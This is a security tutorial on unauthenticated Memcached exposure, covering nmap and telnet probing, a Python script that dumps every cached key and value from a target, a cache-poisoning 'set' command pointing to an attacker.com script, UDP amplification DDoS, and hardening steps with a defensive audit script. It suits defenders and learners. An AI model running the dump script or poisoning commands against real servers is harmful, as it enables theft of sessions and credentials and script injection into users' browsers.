What is Memcached Unauthenticated Access? Ways to Exploit, Examples and Impact
Learn to identify and exploit Memcached unauthenticated access, understand DDoS amplification risks, and implement security best practices for your cache.
Memcached is a high-performance, distributed memory object caching system designed to speed up dynamic web applications by alleviating database load. However, when left exposed to the public internet without proper authentication, it becomes a significant security liability. This guide explores the technical details of Memcached unauthenticated access, how attackers exploit it, and the devastating impact it can have on infrastructure.
What is Memcached?
To understand the vulnerability, we must first understand the service. Memcached is an in-memory key-value store. It is frequently used to store the results of database calls, API calls, or page rendering to improve performance. By default, Memcached listens on TCP port 11211; releases before 1.5.6 also listened on UDP port 11211 by default, and the UDP listener can still be enabled explicitly on newer versions.
Historically, Memcached was designed for use within trusted internal networks. Because of this design philosophy, it does not have authentication enabled by default. Developers are expected to firewall the service or bind it to a local interface. When these steps are skipped, any user who can reach the IP address and port can interact with the data stored in memory.
Understanding Memcached Unauthenticated Access
Unauthenticated access occurs when a Memcached instance is reachable over the network without requiring a password or cryptographic key. Since the Memcached protocol is simple and text-based (ASCII), an attacker can use tools as basic as telnet or netcat to interact with the service.
The core issue is that the service trusts any incoming connection. This allows an external party to execute commands to read data, modify it, or even use the server as a launchpad for larger attacks. In the context of modern cloud environments, many developers accidentally expose these instances by using permissive Security Groups or failing to configure the memcached.conf file correctly.
How to Identify Exposed Memcached Instances
Security researchers and attackers alike use scanning tools to find exposed Memcached servers. The most common method is using nmap to check for port 11211.
Using Nmap to Scan for Memcached
You can identify a Memcached service and its version using the following command:
nmap -sV -p 11211 <target-ip>
To go a step further, Nmap includes a script specifically for Memcached discovery and basic information gathering:
nmap -p 11211 --script memcached-info <target-ip>
If the output lists server statistics such as the version, uptime, and connection counts, the instance answered a command without any credentials: it is unauthenticated and exposed.
Manual Verification via Telnet
A simple way to verify access is to connect via telnet:
telnet <target-ip> 11211
Once connected, type stats and press Enter. The server answers with its internal metrics as a series of STAT lines terminated by END. If you see that data rather than a connection refusal or an immediate disconnect, the server accepts unauthenticated commands. There is no "Authentication required" message to look for: a SASL-protected instance does not serve the plain-text protocol at all, so any stats output is proof that the instance is open.
Ways to Exploit Memcached Unauthenticated Access
Exploitation generally falls into three categories: data exfiltration, data manipulation, and abuse of the server for Distributed Denial of Service (DDoS) amplification.
1. Data Exfiltration: Dumping Keys and Values
Because Memcached stores application data, an attacker can dump the contents of the cache to find sensitive information. This might include session tokens, user credentials, API keys, or database fragments.
To see what is inside, an attacker first lists the slab classes (the fixed-size memory buckets that items are stored in) that currently hold items:
stats items
The output contains lines such as STAT items:1:number 42, where 1 is the slab class ID and 42 the number of items in it. With the IDs in hand, the attacker lists the keys held in a specific class. For example, to dump keys from slab class 1:
stats cachedump 1 100
This returns up to 100 entries of the form ITEM <key> [<bytes> b; <expiry> s]. cachedump is a legacy debugging command whose output is capped, so on a busy cache it will not show every key; newer releases also offer lru_crawler metadump all, which walks the entire cache. Either way, with the keys in hand the attacker retrieves the actual data using the get command:
get session_user_12345
If the application stores serialized PHP objects or JSON-encoded session data, the attacker can hijack active user sessions without ever knowing a password.
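The identification and key-dumping steps above, put together as a small Python client that speaks the ASCII protocol. This is an added example, not code from the original article: the target host and port and the sample replies used to exercise the parsers are constructed, and the script must only be pointed at an instance you are authorised to test. It reads every VALUE payload by its declared length rather than scanning for END, because cached values can contain anything, including CRLF sequences.

```python
"""Probe a Memcached instance and dump the keys it exposes (ASCII protocol).

Added example, not part of the original article. Runs the same sequence the
text describes: stats -> stats items -> stats cachedump <slab> <n> -> get <key>.
Only use it against servers you are authorised to test.
"""
import re
import socket
import sys

END = b"END\r\n"
ITEM_RE = re.compile(r"^ITEM (\S+) \[(\d+) b; (\d+) s\]$")  # one 'stats cachedump' line
ERRORS = (b"ERROR", b"CLIENT_ERROR", b"SERVER_ERROR")


def parse_stats(text):
    """Turn 'STAT <name> <value>' lines into a dict (works for stats and stats items)."""
    stats = {}
    for line in text.splitlines():
        parts = line.split(" ", 2)
        if len(parts) == 3 and parts[0] == "STAT":
            stats[parts[1]] = parts[2]
    return stats


def slab_ids(stats_items_text):
    """Return the slab class ids that currently hold items, from 'stats items' output."""
    ids = []
    for name, value in parse_stats(stats_items_text).items():
        match = re.fullmatch(r"items:(\d+):number", name)
        if match and int(value) > 0:
            ids.append(int(match.group(1)))
    return sorted(ids)


def parse_cachedump(text):
    """Return (key, size_in_bytes, expiry_unix_time) tuples; an expiry of 0 means never."""
    items = []
    for line in text.splitlines():
        match = ITEM_RE.match(line)
        if match:
            items.append((match.group(1), int(match.group(2)), int(match.group(3))))
    return items


def parse_get(raw):
    """Parse 'VALUE <key> <flags> <bytes>\\r\\n<data>\\r\\n...END' into {key: (flags, data)}.

    Data is sliced by the declared length, so values containing CRLF are handled.
    """
    values = {}
    pos = 0
    while raw.startswith(b"VALUE ", pos):
        eol = raw.index(b"\r\n", pos)
        fields = raw[pos:eol].split(b" ")          # VALUE key flags bytes [cas]
        nbytes = int(fields[3])
        start = eol + 2
        values[fields[1].decode()] = (int(fields[2]), raw[start:start + nbytes])
        pos = start + nbytes + 2                   # skip the data and its trailing CRLF
    return values


def _read_until_end(rfile):
    """Read one reply up to END, consuming VALUE payloads by their declared length."""
    chunks = []
    while True:
        line = rfile.readline()
        if not line:
            raise ConnectionError("server closed the connection before END")
        if line == END:
            return b"".join(chunks)
        if line.startswith(ERRORS):
            raise ValueError(line.decode(errors="replace").strip())
        chunks.append(line)
        if line.startswith(b"VALUE "):
            chunks.append(rfile.read(int(line.split()[3]) + 2))


def probe_and_dump(host, port=11211, keys_per_slab=100, timeout=3.0):
    """Return (stats, {key: value_bytes}). Any reply to 'stats' means no credentials are needed."""
    with socket.create_connection((host, port), timeout=timeout) as sock, \
         sock.makefile("rb") as rfile:
        def query(cmd):
            sock.sendall(cmd.encode() + b"\r\n")
            return _read_until_end(rfile)

        stats = parse_stats(query("stats").decode(errors="replace"))
        dumped = {}
        for slab in slab_ids(query("stats items").decode(errors="replace")):
            listing = query(f"stats cachedump {slab} {keys_per_slab}")
            for key, _size, _expiry in parse_cachedump(listing.decode(errors="replace")):
                for name, (_flags, data) in parse_get(query(f"get {key}")).items():
                    dumped[name] = data
    return stats, dumped


if __name__ == "__main__":
    target = sys.argv[1] if len(sys.argv) > 1 else "127.0.0.1"   # constructed default target
    server_stats, cache = probe_and_dump(target)
    print(f"version {server_stats.get('version')}, up {server_stats.get('uptime')}s, "
          f"{server_stats.get('curr_items')} items; dumped {len(cache)} keys")
    for name, data in list(cache.items())[:20]:
        print(name, data[:80])
```

Run it as python3 probe.py <target-ip>. If it prints a version line at all, the instance accepted commands without authentication; the dumped keys and the first bytes of each value show what an attacker would see.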
2. Data Manipulation: Poisoning the Cache
If an attacker can read data, they can also write it. By using the set command, an attacker can overwrite existing cache entries. This is known as cache poisoning.
Imagine an application that caches the URL of a JavaScript file under the key script_url. The set command takes the key, client flags, an expiry in seconds, and the exact byte length of the data that follows on the next line. The attacker can overwrite the entry with a link to a script they control (the URL below is 33 bytes long; if the count does not match, the server either waits for the missing bytes or rejects the block with CLIENT_ERROR bad data chunk):
set script_url 0 3600 33
https://attacker.com/malicious.js
The server replies STORED. When the legitimate application next reads script_url, it receives the attacker's URL and embeds the attacker's script in its pages, which then executes in the browser of every user of the platform: a Cross-Site Scripting (XSS) attack delivered through the cache.
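Writing a poisoned entry by hand is error-prone because the server reads exactly the number of bytes declared in the set header. The helper below is an added example, not code from the article: it builds the command with the byte count computed, enforces the protocol's key rules (at most 250 bytes, no whitespace or control characters) and the default 1 MB item limit, and checks the framing of a command typed by hand so a miscounted header is caught before it reaches the wire. The key and URL are the article's illustrative values; the URL is 33 bytes long.

```python
"""Build and sanity-check Memcached ASCII 'set' commands.

Added example, not from the original article. The server reads exactly the
byte count declared in the header, so this computes it instead of trusting a
hand-typed number, and rejects keys the server itself would refuse.
"""

MAX_KEY_BYTES = 250                  # ASCII protocol limit on key length
DEFAULT_ITEM_SIZE_MAX = 1024 * 1024  # memcached's default -I (item size) limit
STORAGE_REPLIES = {b"STORED": True, b"NOT_STORED": False, b"EXISTS": False, b"NOT_FOUND": False}


def build_set(key, value, flags=0, exptime=0, noreply=False, item_size_max=DEFAULT_ITEM_SIZE_MAX):
    """Return b'set <key> <flags> <exptime> <bytes>[ noreply]\\r\\n<data>\\r\\n'."""
    key_bytes = key.encode()
    data = value.encode() if isinstance(value, str) else bytes(value)
    if not 0 < len(key_bytes) <= MAX_KEY_BYTES:
        raise ValueError(f"key must be 1..{MAX_KEY_BYTES} bytes")
    if any(b <= 0x20 or b == 0x7F for b in key_bytes):
        raise ValueError("key must not contain whitespace or control characters")
    if len(data) > item_size_max:
        raise ValueError(f"value exceeds the item size limit of {item_size_max} bytes")
    if not 0 <= flags <= 0xFFFFFFFF:
        raise ValueError("flags must fit in 32 bits")
    header = f"set {key} {flags} {exptime} {len(data)}" + (" noreply" if noreply else "")
    return header.encode() + b"\r\n" + data + b"\r\n"


def check_set_framing(raw):
    """Return (declared_bytes, actual_bytes) for a raw set command; the two must be equal."""
    header, sep, rest = raw.partition(b"\r\n")
    fields = header.split()
    if not sep or len(fields) < 5 or fields[0] != b"set":
        raise ValueError("not a complete set command")
    if not rest.endswith(b"\r\n"):
        raise ValueError("data block must be terminated by CRLF")
    return int(fields[4]), len(rest) - 2


def parse_storage_reply(line):
    """Map the server's one-line reply to True (stored) or False; raise on error replies."""
    reply = line.strip()
    if reply in STORAGE_REPLIES:
        return STORAGE_REPLIES[reply]
    raise ValueError(reply.decode(errors="replace") or "empty reply")


if __name__ == "__main__":
    # The article's poisoning example, built with the count computed (33 bytes).
    cmd = build_set("script_url", "https://attacker.com/malicious.js", flags=0, exptime=3600)
    print(cmd.decode(), end="")
    print("framing of built command:", check_set_framing(cmd))
    # The same command with a miscounted header: declared and actual lengths disagree.
    typo = b"set script_url 0 3600 35\r\nhttps://attacker.com/malicious.js\r\n"
    print("framing of hand-typed command:", check_set_framing(typo))
```

Pipe the output of build_set into a socket (or nc) and read back one line with parse_storage_reply; anything other than STORED means the write did not land.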
3. The Memcached DDoS Amplification Attack
Perhaps the most famous exploitation of Memcached is its use in Distributed Denial of Service (DDoS) attacks. This leverages the UDP transport, which releases before 1.5.6 enabled by default alongside TCP.
In a reflection attack, the attacker sends a small UDP request to the Memcached server but spoofs the source IP to be the address of the victim, so the reply is delivered to the victim instead. UDP has no handshake, so the server cannot tell the request was forged. To maximise the damage, the attacker first uses the unauthenticated access to store a value close to the maximum item size (1 MB by default) and then sends a stream of spoofed get requests for that key; each request of a few dozen bytes makes the server emit the entire value toward the victim.
In February 2018, GitHub was hit by a 1.35 Tbps DDoS attack using this method, at the time the largest ever recorded. The amplification factor for Memcached has been measured at up to roughly 51,000x: a 15-byte stats request (the 8-byte UDP frame header plus stats and CRLF) can elicit about 750 KB of response.
Real-World Impact
The impact of an exposed Memcached instance ranges from privacy breaches to total service outages.
- Information Disclosure: Sensitive PII (Personally Identifiable Information) can be leaked if the cache stores user profiles or temporary data.
- Account Takeover: Session IDs stored in Memcached are prime targets for attackers looking to bypass login screens.
- Infrastructure Costs: If your servers are used in a DDoS amplification attack, you may face massive bandwidth bills and potential suspension from your cloud provider.
- Reputational Damage: Data leaks resulting from simple misconfigurations are often viewed harshly by customers and regulators.
How to Prevent Memcached Unauthenticated Access
Securing Memcached is straightforward and should be a standard part of any deployment checklist.
1. Bind to Localhost
Unless other hosts genuinely need to reach it, Memcached should listen only on the loopback interface. Upstream memcached binds to all interfaces when no -l option is given, so set it explicitly; the Debian and Ubuntu packages ship a configuration file (usually /etc/memcached.conf) that already does so. Ensure the -l parameter is set to 127.0.0.1 (add a second -l ::1 line if local clients use IPv6):
# Run memcached as a daemon. This command is implied, and is not needed for the
# config file. Be careful that you don't list options here which are also
# listed on the command line.
-d
# Log memcached's output to /var/log/memcached.log
logfile /var/log/memcached.log
# Specify which IP address to listen on. The default is to listen on all IP addresses
-l 127.0.0.1
After changing this, restart the service:
sudo systemctl restart memcached
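A configuration file is only half the story; what matters is the address the running process actually bound, which a command-line override or a second unit file can change. The script below is an added example, not code from the article. It parses the output of ss -Hltnu (listening TCP and UDP sockets, numeric ports, no header line, from iproute2 on Linux) and flags any socket on port 11211 that is not on loopback, so wildcard binds such as 0.0.0.0 or [::] are caught. The sample ss output used in the test is constructed.

```python
"""Audit which addresses memcached is actually bound to, from `ss` output.

Added example, not from the original article. It runs `ss -Hltnu` (listening
TCP and UDP sockets, numeric, no header) and reports any socket on the
memcached port that is reachable from beyond the loopback interface.
"""
import subprocess

LOOPBACK = {"127.0.0.1", "::1"}
WILDCARD = {"0.0.0.0", "::", "*"}


def parse_ss_listeners(ss_output):
    """Return (netid, address, port) per line; netid is tcp/udp, or '?' if ss omitted the column."""
    listeners = []
    for line in ss_output.splitlines():
        fields = line.split()
        # The local address is the first <addr>:<port> field. ss prints a leading
        # Netid column only when more than one protocol (-t and -u) is requested.
        local = next((f for f in fields if ":" in f and not f.endswith(":*")), None)
        if local is None:
            continue
        addr, _, port = local.rpartition(":")
        if not port.isdigit():
            continue
        addr = addr.strip("[]").split("%")[0]          # drop IPv6 brackets and %scope suffix
        netid = fields[0] if fields[0] in ("tcp", "udp") else "?"
        listeners.append((netid, addr, int(port)))
    return listeners


def exposed_memcached_sockets(ss_output, port=11211):
    """Return (netid, address, kind) for sockets on `port` that are not loopback-only."""
    exposed = []
    for netid, addr, bound_port in parse_ss_listeners(ss_output):
        if bound_port != port or addr in LOOPBACK:
            continue
        kind = "wildcard" if addr in WILDCARD else "specific"
        exposed.append((netid, addr, kind))
    return exposed


def audit_memcached_listeners(port=11211):
    """Run ss and return exposed sockets; an empty list means loopback-only (or not running)."""
    result = subprocess.run(["ss", "-Hltnu"], capture_output=True, text=True, check=True)
    return exposed_memcached_sockets(result.stdout, port)


if __name__ == "__main__":
    findings = audit_memcached_listeners()
    if not findings:
        print("port 11211: no listeners beyond loopback")
    for netid, addr, kind in findings:
        print(f"EXPOSED {netid} {addr}:11211 ({kind} bind)")
```

A "specific" finding on a private address (for example 10.0.0.5) is only acceptable if the firewall rules in the next section restrict who can reach it; a "wildcard" finding means the restart did not pick up the -l setting and needs investigating.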
2. Enable SASL Authentication
If you must access Memcached over a network, enable Simple Authentication and Security Layer (SASL), which requires clients to present a username and password before the server accepts any command.
This needs a build compiled with --enable-sasl (memcached -h lists the -S option when it is available). Start Memcached with the -S flag; it then reads its Cyrus SASL settings from /etc/sasl2/memcached.conf (typically mech_list: plain and a sasldb_path), and you create accounts with saslpasswd2 -a memcached -c <username>. Two caveats: SASL works only over the binary protocol, so every client must support it, and the PLAIN mechanism sends the password in clear text, so pair it with TLS or an encrypted network path.
3. Use Firewalls and Network Segmentation
Never expose port 11211 to the public internet. Use iptables, ufw, or cloud-native Security Groups to restrict access to specific trusted IP addresses (e.g., your web server's private IP).
Example using UFW to allow only a specific internal IP:
sudo ufw allow from 10.0.0.5 to any port 11211
sudo ufw deny 11211
4. Disable UDP if Not Needed
The UDP transport is the vector for DDoS amplification, so disable it unless a client actually needs it. Add -U 0 to the configuration (or the command line) to turn the UDP listener off. Memcached 1.5.6 and later ship with UDP disabled by default, but a distribution config or an old startup script may still enable it, so verify against the running process rather than assuming.
Conclusion
Memcached unauthenticated access is a classic example of how a tool designed for performance can become a weapon if security is treated as an afterthought. From simple data theft to record-breaking DDoS attacks, the risks are too high to ignore. By following basic hardening steps (binding to localhost, using firewalls, and disabling UDP), you can enjoy the performance benefits of Memcached without the associated security headaches.
To proactively monitor your organization's external attack surface and catch exposures before attackers do, try Jsmon.